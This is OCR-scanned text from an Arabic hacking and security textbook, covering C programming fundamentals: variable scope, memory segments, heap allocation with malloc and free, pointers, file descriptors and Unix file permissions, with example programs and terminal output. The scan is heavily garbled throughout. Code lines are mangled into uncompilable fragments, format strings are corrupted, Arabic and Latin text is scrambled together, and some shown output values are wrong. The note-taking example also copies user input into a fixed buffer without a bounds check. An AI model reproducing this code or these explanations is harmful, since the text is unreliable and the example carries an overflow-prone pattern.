finclude «stdio.h» 
int j = 42; // j is a global variable. 


void func3() { 
Tat i -= 11,4 gy 999; // Here, j is a local variable of func3( ). 
printf("NtNtNt[in func3] i = $d, j = Sd\n", i, 3); 

} 


€ 


void func2() { 

int i= 7; 

printf("\t\t[in func2] i = $d, j = Sd\n", i, j); 
printf("\t\t[in func2] setting j = 1337\n"); 

Writing to j (this is not local variable!)‏ // ;2337 رل 
func3();‏ 
printf("\t\t[back in func2] i = Sd, J = d\n", i, J);‏ 
} 


E 


void funcl() { 


int i= 5; 

printf("Nt[in funcl] i = $d, j = d\n", i, Jj)? 
func2(); 

printf ("\t [back in funcl] i = $d, j = %d\n", i, j); 


) 


int main() 4 


int i = 3; 

printf("[in main] i = $d, j = d\n", i, م(‎ 
funcl )( ۶ 

printf("[back in main] i = Sd, j = Sd\n", i, م(‎ 
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نبدأ بال ) :main(‏ 
تقوم دالة ال printf‏ بطباعة (i23)‏ و OY (j=42)‏ ز تم تعريفها فوق.. قبل أي شيء فهي «global variable‏ أ أي أن bo‏ 


موضع (à‏ ال memory‏ بحيث یمکن e‏ ال functions‏ أن تصل إليه!. بعكس ال "local variables"‏ حيث يتم 
تخزینها مع محتويات ال function‏ الخاصة ما فقط. 


dll 
.global ..يتم طباعته وطباعة )42 = « لاا‎ (local var i) ننتقل إلى ال 2 حیث تم تعريف‎ 
في‎ la SX بدون آن‎ (j = 1337( وذلك عندما کتبنا‎ (global var j) جذث شيء عجيب!. سنقوم بتعديل قيمة ال‎ e 


بداية ال func2‏ بصيغة “int j"‏ ..فهذه صيغة ال local vars‏ والآن حدث تعديل في قيمة ”ز“ فقد أصبحت 1337 


.42 من‎ Va 


ننتقل الى ال func3‏ حيث تم تعریف كلاً من (j 5i)‏ على vars eel‏ 10001 فقد استخدمنا La j‏ داخلياً وأعطیناها قيمة 
هي 999( وبالتالي سيقوم ال compiler‏ باستخدام ال [ التي : تعريفها ك local‏ عن تلك ال global‏ أثناء تعامّله مع 
()3عهنة.. نم أثناء العودة إلى ال ( )10002 2« PLII‏ مع ال *j"‏ ال global‏ التي قمنا بتغيير قیمتها إلى 1337 قبل 
ce‏ ال call‏ لل ( func3(‏ مُباشرة قَتَطبَع قيمة 1 و j‏ مجدداً.. ثُم تنتهي ال ( )50202 من عَمَلِها لیعود ال 
"instruction pointer"‏ إلى ال Caller function‏ وهي -funcl()‏ و تحدید آخر سطر فيهاء يتم تنفيذه ثم العودة إلى 


ال main()‏ مرةٍ آخری. YY‏ هی ال caller‏ الأسامى لل funcl()‏ 
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النتائج: 


reader@hacking:~/booksre $ gcc scope2.c 
reader@hacking:~/booksre $ ./a.out 
[in main] i = 3, j = 42 
[in funcl] i = 5, j = 2 
[in func2] i= 7, j = 2 
[in func2] setting j = 1337 
[in func3] i» 11, j = 999 
[back in func2] 1 = 7, j = 1337 
[back in funcl] i = 5, j = 1337 
[back in main] i = 3, j = 1337 
reader@hacking:~/booksrce $ 
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Memory Segmentation 


هيا لنخرّج إلى فاصل آخر!.. 
ل عن بعض الأمور aii‏ بال .memory segmentation‏ کنا قد تكلمنا من قبل عن ال :x86 architecture‏ 


سنتكلم عن هذا ال oe 123& architecture‏ بعض o‏ وسنتكلم is‏ لاحقاً في الباب الغاليك Lad‏ 


CPU 


Control 


Input/Output Devices 


thardware 2b ,SÀ BW كا تری فهو 03903 من‎ 
= The central processing unit (CPU) executes code. 
= The main memory of the system (RAM) stores all data and code. 
= An input/output system (I/O) interfaces with devices such as hard drives, Keyboards, and 
monitors. 
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ام إلى ال Main Memory‏ فهی ما ريده الآن. 


$ 


تقسّم ال RAM‏ الى أربعة أقسام أساسية وهي: 
Data, Code, Heap, and Stack‏ 


bbs‏ شکل یوضح ال Main Memory‏ » وبعض ال Sections‏ بداخلهاء سنقوم إنشاءالله بشرح وظيفة كل منهم. 


Low Memory Address 


High Memory Address 
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Data 
لا‎ lal بمعنى‎ Static values إما أن تكون‎ values ال‎ ois للبرنامج.‎ 4 d eX عندما‎ Values هذا هو مرن ال‎ 


تتغير أثناء foe‏ البرنامج. أو النوع الآخر وهو ال Global values‏ وهو أنها قیم متاحة لاي function‏ داخل 
البرنامج. 

لكن هناك ملاحظة صغيرة.. نعني بال G oi "Data"‏ من هذه الأنواع من المتغيرات قد تم عمل U initialized‏ بقيمة 
محددة» سنقوم بوضعها في "Data Section" JI‏ أما إذا لم تُعرفها بقيمة محددة فلن يتم وضعها هنا!» ستذهب إلى 


."Bss Section" آخر يسمى‎ 0 


الفرق بين ال initialized‏ وال :uninitialized‏ 


int global var; 


int global initialized var - 5; 


في الحالة الأولى سيتم تخزين هذا المتغير في قسم ال "Bss"‏ لانه LÍ Uninitialized variable Ga‏ في الحالة الثانية 


فنحن قمنا بإعطائه قيمة هي )5( فأصبح "initialized var"‏ وبالتالي سيتم تخزينه في قسم ال ."Data"‏ 


Code or Text Section 
instructions فهو يحتوي على ال‎ Compiled Code ال‎ «J| هذا هو المكان الذي يذهب‎ 
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Heap 
تقوم‎ lel -program execution أثناء ال‎ Dynamic memory فهى مسؤولة عن ال‎ doe مهمة‎ Segment هذه ال‎ 


بعمل allocate‏ لل values‏ الجديدة التي تظهر آثناء عمل البرنامج» وف نفس الوقت تقوم BA‏ بعمل free‏ أي تفريغ 
لل memory‏ من القيم التي يعد البرنامج بحاجة الیها!؛ لهذا يطلق عليها بال "Dynamic memory"‏ لأا تزيد 
وتنقص بناءً على المتطلبات. 

Vue‏ على ذلك الْتصفحات. gb‏ تعتمد على Tadi lia‏ لأنها تستهلك الذاكرة وفق نوع النشاط الذي تمارسة أنت على 


الانترنت.. يوجد نوع من الثغرات “Heap Overflow” | As‏ يُمكنك القراءة عنه. 


Stack 
الخاصة بال‎ parameters وال‎ Local Variables تتعامل مع ال‎ lal وكيا آشرنا‎ B كنا قد تكلمنا عنها‎ 


Functions‏ ستلاحظ وجود علاقة بين ال Heap‏ و ال Stack‏ حيث يتموضعان في نفس المساحة كل منهما في طرف» 
aig Oly y‏ وفقاً للحاجة!» le?‏ تزداد ال stack‏ على حساب cheap Jl‏ والعكس صحيح !» وهذا لتحسين 
استغلال ال memory‏ ولتلافي الهدر في المساحات قدر المستطاع. 


لاحظ ال Heap‏ وال Stack‏ في الشكل التالي: 


al‏ يظهر به ال "Bss Section"‏ الذي l‏ یظهر في ال Layout‏ الاضی.. دک أنه D‏ لتخزين ال 


."Uninitialized variables" 
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Understanding Hacking and Information Security القرصنة الإلكترونية وأامن المعلوما رنه‎ 


Low addresses Text (code) segment 
Data segment 


Heap segment 


The heap grows 
down toward 
higher memory 
addresses. 


The stack grows 
up toward lower 
memory addresses. 


Stack segment 


High addresses 


Source: Ref [1 


هيا لتعود من جدید لاستكمال الأساسيات البرمجية.. لا تقلق فقد شارفنا على الانتهاء من هذا الباب!. 


The Heap 


كا ذكرنا من قبل» ol‏ طريقة ال declare‏ للمتغير هى التى يد vr = ol‏ إما في ال Bss Segment‏ أو في ال 


.Data Segment‏ بين) إذا Us jl‏ حجز مساحة داخل ال Heap‏ فنستخدم eut «malloc( ) et function‏ تستقبل 
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منك هذه الدالة argument‏ وحيده وهی ال Size‏ المساحة التى تود حجزهاء i I3] s‏ تتمکن ال ) malloc(‏ من حجز 
تلك المساحة فإنها ترجع لك "0 ."Null Pointer with value‏ 
Laf‏ من cac X‏ وجود Function‏ مُناظرة ھا US‏ تقوم بتفريغ مساحة ال Heap‏ كي Ute‏ من استخدامها لاحقاً.. 


.Free( ) عليها‎ gle 


مایل شكل الدالة: 


in! 
in 


array[10]; 
* array = malloc(10 * sizeof(int)); 


ct ct 


في «C JL‏ يم تنفيذ القوس الداخلي Ail‏ ثم ا خارجي.. LA‏ ستقوم ال ( sizeof(‏ بجساب المساحة الطلوبة حيثُ 


تقوم بالتالي: المساحة الطلوبة One Integer J‏ مضروبة في ۰10 بمعنى: "مساحة لاستيعاب عشرة أرقام من نوع int‏ 


ثم تقوم ال ( malloc(‏ بحجز الساحة داخل ال Heap‏ وترجع نا pointer‏ يشير إلى عنوان هذا ال block‏ داخل ال 
Heap‏ هذا ال pointer‏ في مثالنا بالأعلى سیکون: array‏ 
هناك ملاحظة متعلقة بال ( malloc(‏ فهي تقوم بحجز مساحة ما في ال Heap‏ دون ot Data type JL ele»‏ 


حجز المساحة las‏ فتقوم بإرجاع pointer UJ‏ لکن من نوع Void‏ .. 


لحظة!. .ما هذا ال void pointer‏ ؟ 


Sas. m‏ الذهاب للفقره التالية التي بعنوان Ei "void pointer"‏ عد إلى هنا من جديد. 
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والآن وبعد cer ol‏ ال pointer‏ ۰۷۵10 هيا لنقوم بحل هذا الإشكال الخاص بال ) malloc(‏ سنقوم بإضافة شیء ما 
للتأكيد على نوع ال data type‏ الخجرزة في ال ..heap‏ ببساطة سنقوم بعمّل Casting‏ لهذا ال void pointer‏ إلى ال 


LU التى نود حجز المساحة‎ data type 


هل نسيت ال Cast‏ ؟.. 


es :‏ ك مُراجعته إن احتجت. بالعوده إلى فقرة ال .Typecasting‏ 


هذا مثال يوضح لك الحالتين.. الأولى بدون «Cast‏ والثانية بال Cast‏ 


qnt. w pEr; 
ptr = malloc(10 * sizeof(int)); /* without a cast */ 
ptr = (int *)malloc(10 * sizeof(int)); /* with a cast */ 


في بعض الأحيان تفشل ال ) malloc(‏ في حجز المساحة رب KS‏ حجم ال buffer‏ الطلوب أو GY‏ سبب آخره 
وبالتالى پمکننا إضافة كود بسيط يقوم بعمل Error checking‏ ليتأكد UJ‏ من عملية ال allocation‏ 


int * array = malloc(10 * sizeof(int)); 
if (NULL == array) { 
fprintf(stderr, "malloc failed\n"); 


return(-1); 


} 


لنرى معاً كيف تعمل هذه ال Functions‏ بوثال رائع!» ولكن ad‏ بحاجّة AL‏ الفاهیم الأولية gill pea‏ الجيد 
Judi Là‏ تذكر آننا قد تکلمنا عن ال dael yl, pointers‏ مارأيك باجراء مراجعة سریعة؟.. لا بأس!.. 
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انتبه لهذا الشكل: 


Variable Name 3 ۱ j k 
Value of Variable > 65524 65522 
Address of Location > 65524 65522 65520 


.)& = 65524) lex ») = 3) جيداً.. أليسَ كذلك؟.. فمثلاً:‎ Sega أننا‎ ubl 


AL)‏ مثال على هذا المتغير أ: 


int main() 

1 
int *ptr, i; 
i = 3; 


/* address of i is assigned to ptr */ 
ptr = &i; 


/* show i's value using ptr variable */ 
printf("Value of i : Sd", *ptr); 


return 0; 


و 


ta‏ بتعريف متغيّر cl‏ و pointer‏ اسمه e «ptr‏ جعلنا هذا ال guis pointer‏ إلى ال ."address-of i"‏ ثم أردنا طباعة 
Ob se‏ هذا ال "block of memory"‏ الذي ade‏ الیه ال «pointer‏ وهو الرقم )3( هنا سنضع )*( قبل ال pointer‏ 
عندما نستدعيه داخل ال ( *printf(‏ و هذه العملية “Dereferencing of Pointer"‏ 


وتكون المخرجات في النهاية كاتالي: 3 : value of i‏ 
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= (&)symbol is used to get address of variable 

= (*)symbol is used to get value from the address given by pointer. 

= (*)Symbol when used with Pointer variable it refers to variable being pointed to, this is 
called as “Dereferencing of Pointers”. 


LA‏ عرّفنا (num aw) pa)‏ و pointer)‏ إسمة (ptr‏ )22 إلى هذا خی وهذا الجدول يوضح نقاط التشابه بين ال 
ptr‏ و ال &num‏ و على الوجه الآخر قيمة المتغير num‏ وال à JE “Dereferencing of Pointer ptr"‏ الرمز *ptr‏ 


Variable Value in it 
num 50 
&num 1002 
ptr 1002 
*ptr 50 
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Void Pointer 


جاء دور ال ..Void pointer‏ 

لنفرض أننا قمنا بعمل declare‏ لثلاثة أنو اع من المتغير ات مثلاً: E «integer, float, and character)‏ أردنا 
تخصيص لكل متغير منهم pointer‏ يشير إلى إليه ely‏ على نوعه» سنقوم حینها بتعریف ثلاثة آنواع من ال pointers‏ 
ولكن Usa,‏ توفير الجهد والإكتفاء ب pointer‏ وحيد. هذا ال pace "void pointer"‏ علینا الجهد UN‏ سنتمكن من 


مُعامّلته ك integer pointer‏ أو character pointer‏ حسب الحاجة. 


void *ptr; // ptr is declared as Void pointer 


char charnum; 
int intnum; 
float floatnum; 


ptr = &charnum; // ptr has address of character data 
ptr = &intnum; // ptr has address of integer data 
ptr = &floatnum; // ptr has address of float data 


نستطيع تلخيص ما سيقوم به ال “void ptr"‏ هنا oig‏ النقاط: 
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Scenario Behavior 

hen We assign address of integer variable to voi : : : 
bos ی ای‎ dtes MERIT AM oid Void Pointer Becomes Integer Pointer 
pointer 
When We assign address of character variable to void Void Pointer Becomes Character 
pointer Pointer 
When We assign address of floating variable to void Void Pointer Becomes Floating 
pointer Pointer 


أود أن أتكلم عن Function‏ تسمى ) atoi(‏ تُستخدّم للتحويل من ال (character data type)‏ الى ال 


Ld 


وأخبر 


ALS في متغیر من نوع‎ (integers) فيا يلي مثال یوضح كيف قمنا بوضع مجموعة آرقام‎ (integer data type) 


(character)‏ وعرضها على الشاشة: 


#include <stdio.h> 
#include <stdlib.h> 
#include <string.h> 


int main() 


{ 
int val; 
char str[20]; 


strcpy(str, "98993489"); 
val = atoi(str); 


printf("String value = $s, 


return(0); 


Int value = %d\n", str, val); 
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تكون النتائج كالتالي: 
String value - 98993489, Int value - 98993489‏ 


کی انتهينا من المقدمة التى تسبق مثال ال .Heap Segment‏ 


Heap Example: 

#include <stdio.h> 
#include <stdlib.h> 
#include <string.h> 


int main(int argc, char *argv[]) { 
char *char ptr; // Achar pointer 
int *int ptr; // ^n integer pointer 
int mem size; 


if (argc « 2) // If there aren't command-line arguments, 
mem size = 50; // use 50 as the default value. 

else 
mem size = atoi(argv[1]); 


printf("\t[+] allocating $d bytes of memory on the heap for 
char ptr\n", mem size); 


char ptr = (char *( malloc(mem size); // Allocating heap memory 
if(char ptr == NULL) ( // Error checking, in case malloc( ) fails 
fprintf(stderr, "Error: could not allocate heap memory. n"); 
exit(-1); 
} 
strcpy(char ptr, "This is memory is located on the heap."); 
printf ("char ptr (%p) --< '%s'\n", char ptr, char ptr); 


printf("\t[+] allocating 12 bytes of memory on the heap for 
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int_ptr\n"); 
int ptr = (int *) malloc (12); // Allocated heap memory again 


if(int ptr == 


NULL) { // Error checking, in case malloc( ) fails 


fprintf(stderr, "Error: could not allocate heap memory.\n") ; 


exit(-1); 


) 


*int ptr = 31337; // Put the value of 31337 where int ptr is pointing. 
ptr (ep) --< Sd\n", int ptr, *int ptr); 


printf ("int | 


printf("NtI]-] 


freeing char ptr's heap memory...\n"); 


free(char ptr); // Freeing heap memory 


printf("Nt[-*] 


allocating another I5 bytes for char ptrin"); 


char ptr = (char *) malloc(15);  //Allocating more heap memory 


if(char ptr -- 


NULL) ( // Error checking, in case malloc( ) fails 


fprintf(stderr, "Error: could not allocate heap memory.\n"); 


exit (-1); 


) 


strcpy(char ptr, "new memory"); 


€ 


printf("Nt[- 
free(int ptr 


£ 


printf ("ehar ptr Dep ==> Uses in". ohar ptr; CHEE DEE); 
freeing int ptr's heap memory...Xn"); 
// Freeing heap memory 
freeing char ptr's heap memory...\n"); 


] 

) 
printf("Nt[-] 

z 


free(char ptr); // Freeing the other block of heap memory 


3 


Ga 


في البداية قمنا باستخدام ال iS ..cmd-line arguments‏ کر ol‏ ال arg[0]‏ هو اسم البرنامج arg[1] DUET‏ هی اول 


string‏ نقوم بكتابتها نحن.. بعد إسم البرنامج. 
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e‏ في دالة al if‏ سيستقبل ال arg[1]‏ ليقوم بتحويلها إلى integer‏ باستخدام ) )01اه ثم وضعها في المتغير 
«mem, size‏ لاحظ أنه إذا i‏ يرى ال compiler‏ أي 15 غير الأولى فقط فسيقوم بتحديد مساحة إفتراضية لل 
mem, size‏ ب Bytes‏ ۰50 كي نضمن عمل البرنامج بي حال. ثم تقوم ) printf(‏ بطباعة ما تحويه «mem size‏ في 
bll‏ هذه ستكون 50 حيث أننا لم Jed‏ أي Argus‏ ثم تقوم ال ( malloc(‏ بحجز المساحة الطلوبة في ال Heap‏ 


وإرجاع ال pointer‏ مع عمل ال Cast‏ له كما شرحنا سابقاً. لاحظ الآن أن go char. ptr‏ يشير إلى مايل: 


."address of memory allocated in Heap" 


2 @ 


حجزه لنا کا تری في هذا 


^ 
5 


وباستخدام ( strepy(‏ سنقوم بوضع ile‏ ما في هذا ال block of memory‏ الذي 
السطر: 


strcpy (char ptr, "This is memory is located on the heap."); 


ثم نقوم بطباعة عنوان هذا ال block‏ باستخدام ال «(96p) operator‏ والحملة التي بداخله: 


printf ("char ptr (9p) --> '$%s'\n", char ptr, char ptr); 


ثم قمنا بعمل p allocation‏ $ أخرى ولكن حَددنا المساحة التى 5 Le‏ بشكل مُباشر Bytes"‏ 12" 
int ptr = (int *( malloc (12);‏ 


لاحظ ال Cast‏ هنا الى LY int‏ سنضع بداخلها العدد "31337" .. 


بمناسبة ال ..pointers‏ قل لى ما معنی هذه ال *Instruction‏ 


*int-ptr = 31337; 
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c ODIUM 


printf ("\t[-] freeing int ptr’ s heap memory... in") 3 
free(int ptr); // Freeing heap memory 

printf ("\t[-] freeing char ptr's heap memory...\n"); 
free (char ptr); / Geeta the other block of heap memory: 


bls‏ نتائج الكود: 


readerG8hacking:-^/booksrc $ gcc -o heap example heap example.c 
reader@hacking :~/booksre $ ./heap example 

[+] allocating 50 bytes of memory on the heap for char ptr 

char _ptr (0x804a008) --» 'This is memory is located on the heap.' 
[+] allocating 12 bytes of memory on the heap for int ptr 


int ptr (0x804a040) --> 31337 

[ freeing char ptr's heap memory... 

[+] allocating another 15 bytes for char ptr 
char ptr (0x804a050) --»  'new memory' 

[-] freeing int ptr's heap memory. 

[-] freeing char ptr's heap memory. 
reader@hacking:~/booksre $ 


إلى هنا نکون قد انتهينا من ال .Heap‏ 
Aaa‏ | وء مهم اس تخل برد M‏ انی ۱ فصول القادمة.. سند ¢ ال .“Flie Descriptors”‏ 
إلى موصوع مهم 4 را à‏ عن 
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File Access 


عندما ترغب بفتح ملفي ما على جهازك E‏ ملف «Notepad‏ مالذي DV:‏ في ال Operating System‏ عندما يتم 
فتح الف أمامك؟. 

يقوم نظام التشغيل لديك بإنشاء Entry‏ هذه العملية (عملية فتح هذا (Call‏ 552 فيه البيانات MALL)‏ بهذا اكلف 
ويقوم بالتعبير عن هذا ال Entry‏ برقم.. Si‏ 2100 هذا الرقم unique‏ لهذا الملف» فإذا أردت فتح عدد من الملفات في 
نفس الوقت Sus‏ عشرة ملفات. سيقوم نظام التشغيل بتكوين Entries"‏ ۰۲10 تتخزن هذه ال à Entries‏ مكانٍ ما 
داخل ال «Kernel‏ ویعیر عنهم بأرقام )103,...109 ,102 ,101 ,100). 


هذه الأر قام يُطلّق ."File Descriptors" Jé‏ 


فا هو ال File Descriptor‏ ؟. 


“Tt is an integer number that uniquely represents an opened file in operating system” 


وماهى فائدته؟. 
يبدو آنها طريقة پستخدمها نظام التشغيل Tracking | |J‏ للملفات المفتوحة EN‏ 
تستخدم هذه ال file descriptors‏ مجموعة من ال le (Low-Level Functions)‏ اللفات. نذکر أهمها: 
yi m‏ خن e‏ 
open(), close(), read(), and write()‏ 
هذه ال functions‏ تقوم بإرجاء (1-) فى حالة حدوث أى Error‏ سنعطی مثال يشر > ال file descriptor‏ وبعض ال 
(on‏ بور جاع BN‏ $ ي مثال يشرح م وبعض 


low-level functions 
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cab یقوم بفتح‎ = command-line argument أو حملة قصبرة منك على هيئة‎ note باستقبال‎ ext برنامج‎ ble 
(بمعنى أنه لن يقوم بعمّل 10 للبيانات التي بداخله إن وجدّت)..هذا‎ alll وإضافة هذه الجملة في نهاية هذا‎ 
/tmp/notes يل:‎ |S الملف مساره‎ 

قبل أن نبدأ.. Y‏ وأن تتوقع Lil‏ منستخیم ( open(‏ لتفتح ذلك alll‏ و ( )1106 لتكتّب داخله ما ستعطيه ناه و 
est close( )‏ بإغلاقه au‏ الإنتهاء. إلا أن ) open(‏ هذه Gl gU‏ مصحوبة ببعض التفاصيل FERT‏ بال 


..Access Mode 
."Flags" m. ..هذه التفاصيل‎ fha أم الإثنان‎ ‘Write only el ‘fRead only هل سيكون‎ 
مايلي عضا منها:‎ 
O_RDONLY Open file for read-only access. 


O_WRONLY Open file for write-only access. 
O_RDWR Open file for both read and write access. 


O_APPEND Write data at the end of the file. 


O TRUNC If the file already exists, truncate the file to 0 length. 
O CREAT Create the file if it doesn't exist. 


لكى تتمكن ال ) open(‏ من استخدام هذه ال 5 سنحتاج لِعَمَل oi include‏ ال fentl.h Lib‏ 
#include «fcntl.h»‏ 
ستلاحظ x‏ عمل library J include‏ جديدة esys/stat . h" me‏ يوجد flags‏ آخری يمكن لل ) open(‏ 


استخدامهاء تتعلق بال .."file permissions"‏ 


gl‏ هم بعد قلیل. 


Gb‏ إلى كود البرنامج: 
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#incl 
#incl 
#incl 
#incl 
#incl 


void 
pri 


ude <stdio.h> 
ude <stdlib.h> 
ude <string.h> 
ude <fcntl.h> 
ude <sys/stat.h> 


usage(char *prog name, char *filename) { 
ntf("Usage: $s «data to add to %s>\n", prog name, filename); 


exit(0); 


void fatal (char *);  //A function for fatal errors 


void *ec malloc(unsigned int);  //Anerror-checked malloc() wrapper 


int main(int argc, char *argv[]) 1 
int fd; // file descriptor 
char *buffer, *datafile; 


buffer = (char *) ec malloc(100); 
datafile = (char *) ec malloc(20); 
strcpy(datafile, "/tmp/notes"); 


if(argc « 2) // If there aren't command-line arguments, 
usage(argv[0], datafile);  //display usage message and exit. 
strcpy(buffer, argv[1]);  //Copy into buffer. 
printf("[DEBUG] buffer @ 0: "Ss\'\n", buffer, buffer); 
printf("[DEBUG] datafile @ $p: 'Ss\'\n", datafile, datafile); 
strncat (buffer, "An", 1); / Add a newline on the end. 
// Opening file 
fd = open(datafile, O WRONLY | O CREAT | O APPEND, S IRUSR | 
S IWUSR); 
if(fd == -1) 


fatal("in main() while opening file"); 
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printf("[DEBUG] file descriptor is %d\n", fd); 


// Writing data 
if(write(fd, buffer, strlen(buffer)) -- -1) 
fatal("in main() while writing buffer to file"); 


// Closing file 
if(close(fd) == -1) 
fatal("in main() while closing file"); 


printf("Note has been saved.\n"); 
free(buffer); 
free(datafile); 


// ^ function to display an error message and then exit 
void fatal(char *message) { 
char error message[100]; 


strcpy(error message, "[!!] Fatal Error "); 
strncat(error message, message, 83); 
perror(error message); 

exit(-1); 


// ^n error-checked malloc( ) wrapper function 
void *ec malloc(unsigned int size) { 
void *ptr; 


ptr = malloc(size); 
if(ptr -- NULL) 
fatal ("in ec malloc() on memory allocation"); 


return ptr; 
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La‏ من ال ) OR main(‏ یستقبل البر نامج «command-line arguments‏ رک تعلم arg[0]‏ هي اسم البر نامج 


و 


á 
war Gs 


(Laert te : 5 
هی ما سَندخله نحن!.‎ arguments ال‎ à ثم‎ «simplenote.c ami 


BE‏ بتعر يف cint prs‏ سَيّحيل قيمة ال file descriptor‏ و BE‏ بتحديد buffer LÊ "pointers on strings"‏ و 
a «datafile‏ قامت ال ) ec malloc(‏ بحجز نا مساحة مقدارها bytes‏ 100 لل buffer‏ مع عمل ال casting‏ من 

أجل تخزين ال string‏ بداخله. 
e‏ أيضاً قامت بحجز bytes LÍ‏ 20 لل «datafile‏ لكن سَنضع داخل هذا ال UA datafile‏ ثابتة! سنضعها بداخله 
باستخدام ( ..strepy(‏ هذه الجملة ستكون: “/tmp/notes”‏ 


فمتی ما استدعينا هذا ال datafile‏ سَيذهب بنا إلى ال /tmp/notes‏ 


وللتأكد من عملية إدخال ال arguments‏ تم وضع شرط باستخدام دالة de if‏ 


If (arge > 2) 
usage(argv[0], datafile); 


هذا السطر usage (argv[0], datafile)‏ يعنى: 
ثم بالذهاب إلى ال ( usage(‏ آخذاً معك هذه ال parameters‏ 


Argv [0] which is: simplenote.c, and datafile whichis: /tmp/notes 


هذه ال parameters‏ ستكون مُدخلات لل function‏ الساة ‘void usage‏ 


void usage (char *prog name, char *filename) 1 
printf("Usage: ss «data to add to %s>\n", prog name, filename); 
exit(0); 

} 
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لاحظ آنها void‏ بمعنى al‏ لن يكون هناك return value‏ إلى ال ) main(‏ 


“this is test note" وهی‎ «arg[1] حالة إدخالنا ال‎ Gs 


سنقوم بنسخها إلى ال «buffer‏ وبعدها تقوم ( printf(‏ بطباعتها وطباعة العنوان الخاص بها.. 
"Address of buffer, and buffer"‏ 


آسفل منها ( printf(‏ أخرى سَتطبع مايل: "address of datafile string"‏ و محتوياتها 
string Uil E‏ ثابتة وهی مسار اللف "Amp/notes"‏ 


"T. 
هذا الشىء:‎ Gk ثم‎ 

strncat ( buffer, "Mn", 1 ); 
ونعني به:‎ 


بإضافة ما إلى ال string‏ وهی “this is test note"‏ بمعنى إبدأ سطر جديد بعد أن تنتهى هذه ALL‏ والرقم )1( 


.© memory وهی الساحة التي يَشْعَلها هذا الرمز داخل ال‎ «lb 1 byte تخصیص‎ SF هنه‎ “in? ol يمبي‎ à 


والآن ab‏ لو ضوع الحلقة وهو :low-level-functions‏ 
ستقوم ال ( )0060 بعملية فتح الملف. وكا ترى Lal‏ استخدمت مجموعتين من ال flags‏ يسبقهم مسار الملف المراد 


فتحه. 


Programming 
[82] 


المجموعة الأولى تتكون من ثلاثة flags‏ يفصل بينهم | وهی أحد ال standard logic gates‏ تسمی OR‏ يمكنك 
a‏ هذه ال flags‏ إن نسيت دلالاتهم 
U‏ الجموعة الثانية فهي: S_IRUSR |S IWUSR‏ 


Permissions في فقرة ال‎ Lal إليهم‎ gl. 


S_IRUSR Give the file read permission for the user (owner). 
S. IWUSR Give the file write permission for the user (owner). 


لاحظ أنه عند فش أي ide‏ من العَمّليات الثلاث: open, write, and close‏ سيقوم البرنامج بالانتقال إلى fatal()‏ 
gles‏ لك رسالة error‏ تم اروج خارج البرنامج. ul‏ في JL‏ الطبيعية فسيتم فتح املف وتقوم ( printf(‏ بعرض 
ال fd‏ الخاص ذه العملية. 


هل d‏ گر هذا ال descriptor‏ 116]؟. 


gb 4‏ ال write)‏ لتستقبل string‏ من ال buffer‏ وبالتالي ستحتاج لساب عدد آحرفها كي يتسنى ها کتابتها داخل 
calli‏ هنا سَتقوم ال ) write(‏ باستخدام Function‏ أخرى X‏ باستقبال متویات ال buffer‏ وحساب »Ae‏ 


.strlen( ) nets function ال‎ «à الأحرّف به..‎ 


ols‏ ال function‏ الأخيرة لتغلق الف وهی ) )۰01056 لتظهّر في الختام رسالة: 
"note has been saved"‏ 
e‏ عمل JS free‏ من ال buffer‏ و datafile‏ من ال .Heap‏ ویتم opal gé‏ الخاص بال ) .main(‏ 
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لنشاهد النتائج: 


reader@hacking:~/booksre $ gcc -o simplenote simplenote.c 
reader@hacking:~/booksre $ ./simplenote 

Usage: ./simplenote «data to add to /tmp/notes» 
reader@hacking:~/booksre $ ./simplenote "this is a test note" 
[DEBUG] buffer 8 0x804a008: 'this is a test note' 

[DEBUG] datafile @ 0x804a070: '/tmp/notes' 

[DEBUG] file descriptor is 3 

Note has been saved. 

reader@hacking:~/booksre $ cat /tmp/notes 

this is a test note 

reader@hacking:~/booksre $ ./simplenote "great, it works" 
[DEBUG] buffer @ 0x804a008: 'great, it works' 

[DEBUG] datafile @ 0x804a070: '/tmp/notes' 

[DEBUG] file descriptor is 3 

Note has been saved. 

reader@hacking:~/booksre $ cat /tmp/notes 

this is a test note 

great, it works 

reader@hacking:~/booksrce $ 

reader@hacking:~/booksrce $ 


I 


I 
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File Permissions 


* a7 
- 


es sa التي‎ flags تخصيص مموعة من ال‎ e أنظمة التشغيل.‎ à xal من الأمور‎ file permissions ال‎ ix 
"OR" Èl g باستخدام‎ Le 


هذه ال flags‏ مُقسَّمّة إلى ثلاث ole pod‏ لِتُعطي صلاحیات BW‏ أنواع a‏ الْمستخدِمين» كا يلي: 


User (Owner) 

S IRUSR Give the file read permission for the user (owner). 

S. IWUSR Give the file write permission for the user (owner). 
S IXUSR Give the file execute permission for the user (owner). 


Group 

S. IRGRP Give the file read permission for the group. 

S. IWGRP Give the file write permission for the group. 
S. IXGRP Give the file execute permission for the group. 


Others 

S. IROTH Give the file read permission for other (anyone). 

S IWOTH Give the file write permission for other (anyone). 
S IXOTH Give the file execute permission for other (anyone). 


ا ۰ ۰ ۰ a‏ 15 ^ 40 5 £ 4 
لكل Gb‏ في نظام التشغيل Ge ie s Linux‏ الصلاحيات التي LE‏ لثلائة أنواع Ge‏ المستخدمين: 
Owner, Group, and Others‏ 
لتشاهد هذا بمثال: 


reader@hacking:~/booksre $ 15 -1 /etc/passwd simplenote* 
rw-/r--/r 1 root root 1424 2015-09-06 09:45 /etc/passwd 
-rwx/r-x/r-x 1 reader reader 8457 2015-09-07 02:51 simplenote 
rw-/ / 1 reader reader 1872 2015-09-07 02:51 simplenote.c 


reader@hacking:~/booksre $ 
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e letc/passwd Wale J sl ol lan‏ إعطاء صَلاحيات "read and write"‏ إلى ال «owner‏ و read‏ فقط إلى ال 


.others إلى ال‎ Lal read و‎ «group 


إذا قمنا بتحديد group‏ ۰ فيُمكئنا إضافة users‏ إلى هذا «group‏ وبمُجرد إضافتهم إليه» سَیمتلکون صلاحیات هذا 


-group من ینتمی ذا‎ e Admin صلاحيات ال‎ ee Admins لل‎ group فإذا كان‎ «! group 


GÀ‏ ُشاهد مثال آخریتم فيه تعدیل الصلاحیّات كي تتضح الصورة أكثر: 


reader@hacking:~/booksre $ chmod 731 simplenote.c 
reader@hacking:~/booksre $ ls -1 simplenote.c 


-rwx/-wx/--x reader reader 1826 2007-09-07 02:51 simplenote.c 
reader@hacking:~/booksre $ chmod ugo-wx simplenote.c 
reader@hacking:~/booksre $ ls -1 simplenote.c 

r--/ / reader reader 1826 2007-09-07 02:51 simplenote.c 
reader@hacking:~/booksre $ chmod utw simplenote.c 
reader@hacking:~/booksre $ ls -1 simplenote.c 

rw-/ 7 reader reader 1826 2007-09-07 02:51 simplenote.c 


